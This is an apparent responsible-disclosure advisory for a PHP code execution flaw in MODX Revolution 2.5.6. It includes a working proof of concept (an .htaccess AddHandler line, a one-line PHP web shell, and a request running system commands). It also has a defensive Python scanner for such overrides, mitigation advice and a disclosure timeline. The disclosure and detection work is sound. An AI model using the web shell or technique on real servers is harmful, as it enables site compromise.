Name: MODX Revolution 2.5.6
Vulnerability: PHP code execution
Prerequisites: attacker needs to be an authenticated user with media manager permission
A user with media manager permissions can edit and upload files. This functionality can be used to execute PHP code on the server.
Proof of Concept
The attacker accesses the media browser to edit and upload files. The application prevents the attacker from uploading PHP files directly, but the attacker can still edit the .htaccess file. This can be used to instruct the web server to execute files with other extensions as PHP, leading to code execution on the server and site compromise.
The following scenario demonstrates the issue on the Apache web server.
Media Browser: http://victim.site/manager/?a=media/browser
The attacker edits or uploads a .htaccess file on the server with the following content:
AddHandler application/x-httpd-php .z
This instructs Apache to execute .z files as PHP. Next, the attacker uploads a shell.z with the following content and executes it.
<?php $r=$_REQUEST;if(isset($r['x'])) $r['x']($r['c']);
The attacker can execute PHP on the server by accessing the uploaded file directly, here running ls -lah in the web root: http://victim.site/shell.z?x=system&c=ls%20-lah
total 80K
drwxrwx--- 1 www-data www-data 4.0K Apr  2 23:56 .
drwxrwx--- 1 www-data www-data  12K Mar 31 17:54 ..
-rwxrwx--- 1 www-data www-data 3.4K Apr  4 23:57 .htaccess
drwxrwx--- 1 www-data www-data 4.0K Mar 30 23:33 assets
-rwxrwx--- 1 www-data www-data  285 Mar 31 16:52 config.core.php
drwxrwx--- 1 www-data www-data 4.0K Mar 28 09:00 connectors
drwxrwx--- 1 www-data www-data 4.0K Mar 30 23:33 core
-rwxrwx--- 1 www-data www-data 1.9K Mar 28 08:42 index.php
drwxrwx--- 1 www-data www-data 4.0K Mar 28 09:01 manager
-rwxrwx--- 1 www-data www-data   55 Apr  4 22:39 shell.z
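The technique above leaves two artefacts on disk: a .htaccess handler directive that maps a non-PHP extension to the PHP interpreter, and a file with that extension sitting in the web root. The following script is an added example written for this advisory (it is not MODX code and not part of the original report): it walks a web root, parses every .htaccess for AddHandler/AddType/SetHandler directives that hand files to PHP, and lists the files those directives would expose. The sample tree it scans is constructed inline in a temporary directory, using the .htaccess line and the shell.z from the proof of concept, so it runs offline; the set of handler names treated as "PHP" is an assumption covering the common mod_php, CGI and php-fpm (proxy:fcgi) spellings.

```python
"""Find .htaccess overrides that make non-.php extensions execute as PHP
and list the files they would expose. Added example, not MODX code."""
import os
import re
import tempfile

# Assumption: handler/MIME names that commonly route a request to PHP.
PHP_HANDLER_RE = re.compile(r"(x-httpd-php|php\d*-script|application/php|proxy:fcgi|proxy:unix)", re.I)
DIRECTIVE_RE = re.compile(r"^\s*(AddHandler|AddType|SetHandler)\s+(\S+)\s*(.*)$", re.I)
FILESMATCH_OPEN_RE = re.compile(r'^\s*<FilesMatch\s+"?([^">]+)"?\s*>', re.I)
FILESMATCH_CLOSE_RE = re.compile(r"^\s*</FilesMatch>", re.I)
EXPECTED_PHP_EXTS = {".php"}  # extensions a PHP site is expected to execute


def parse_htaccess(text):
    """Return (directive, handler, targets) for every directive that routes to PHP.
    targets: extensions for AddHandler/AddType, the enclosing FilesMatch regex
    (or "*" when unscoped) for SetHandler."""
    findings, current_filesmatch = [], None
    for line in text.splitlines():
        if line.lstrip().startswith("#"):  # Apache comments are whole lines only
            continue
        m = FILESMATCH_OPEN_RE.match(line)
        if m:
            current_filesmatch = m.group(1)
            continue
        if FILESMATCH_CLOSE_RE.match(line):
            current_filesmatch = None
            continue
        m = DIRECTIVE_RE.match(line)
        if not m or not PHP_HANDLER_RE.search(m.group(2)):
            continue
        directive, handler, rest = m.groups()
        if directive.lower() == "sethandler":
            targets = [current_filesmatch or "*"]
        else:
            targets = [e if e.startswith(".") else "." + e for e in rest.split()]
        findings.append((directive, handler, targets))
    return findings


def suspicious_extensions(findings):
    """Extensions mapped to PHP by AddHandler/AddType that are not expected to be PHP."""
    return {e.lower() for d, _h, ts in findings if d.lower() != "sethandler"
            for e in ts if e.lower() not in EXPECTED_PHP_EXTS}


def scan_webroot(root):
    """For each .htaccess with a PHP handler override, report the directives and the
    files in or below its directory (overrides are inherited) that it would hand to PHP."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        with open(os.path.join(dirpath, ".htaccess"), encoding="utf-8", errors="replace") as fh:
            findings = parse_htaccess(fh.read())
        if not findings:
            continue
        exts = suspicious_extensions(findings)
        regexes = []
        for d, _h, ts in findings:
            if d.lower() == "sethandler":
                for t in ts:
                    try:  # "*" is not a regex; a PCRE-only pattern may not compile either
                        regexes.append(re.compile(".*" if t == "*" else t))
                    except re.error:
                        pass
        exposed = []
        for sub, _d, fs in os.walk(dirpath):
            for name in fs:
                ext = os.path.splitext(name)[1].lower()
                if (ext in exts and ext) or any(r.search(name) for r in regexes):
                    exposed.append(os.path.relpath(os.path.join(sub, name), root))
        report.append({"htaccess": os.path.relpath(os.path.join(dirpath, ".htaccess"), root),
                       "directives": findings, "exposed": sorted(exposed)})
    return report


def build_sample_tree(root):
    """Constructed sample: the advisory's .htaccess line and shell.z beside a real index.php."""
    os.makedirs(os.path.join(root, "assets"))
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("# rewrite rules omitted\nAddHandler application/x-httpd-php .z\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'ok';\n")
    with open(os.path.join(root, "shell.z"), "w") as fh:
        fh.write("<?php $r=$_REQUEST;if(isset($r['x'])) $r['x']($r['c']);\n")
    with open(os.path.join(root, "assets", "notes.txt"), "w") as fh:
        fh.write("plain text\n")


def demo():
    """Scan the constructed tree; expect exactly one .htaccess finding exposing shell.z."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_webroot(root)


if __name__ == "__main__":
    for entry in demo():
        print(entry["htaccess"], entry["directives"], entry["exposed"])
```

Run it against a real document root after a suspected compromise, or periodically from cron; a hit for any extension other than .php is worth an incident ticket, because legitimate sites almost never need one. The more robust fix on the server side is to stop honouring .htaccess in directories the application can write to (AllowOverride None, or at least removing FileInfo from the allowed overrides), which removes the attacker's ability to change handlers at all.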
Taking control of the site administrator's or a media manager's account leads to full compromise, since it allows PHP execution. Any web content injection (WCI, a.k.a. XSS) vulnerability in the MODX core or in any third-party plugin could be used to hijack the administrator's or media manager's session. A single XSS vulnerability can therefore be chained into PHP code execution and site compromise.
An attacker with media manager permissions, or with access to an account that has them, can execute PHP code on the server.
The following release has been published mitigating the issue: https://modx.com/blog/modx-revolution-2.5.7
- 01.04.2017 | me > developer | vulnerability discovered
- 03.04.2017 | me > developer | sent the report to the developers
- 13.04.2017 | developer > me | acknowledged the finding
- 21.04.2017 | developer > public | new version released
- 01.05.2017 | me > public | full disclosure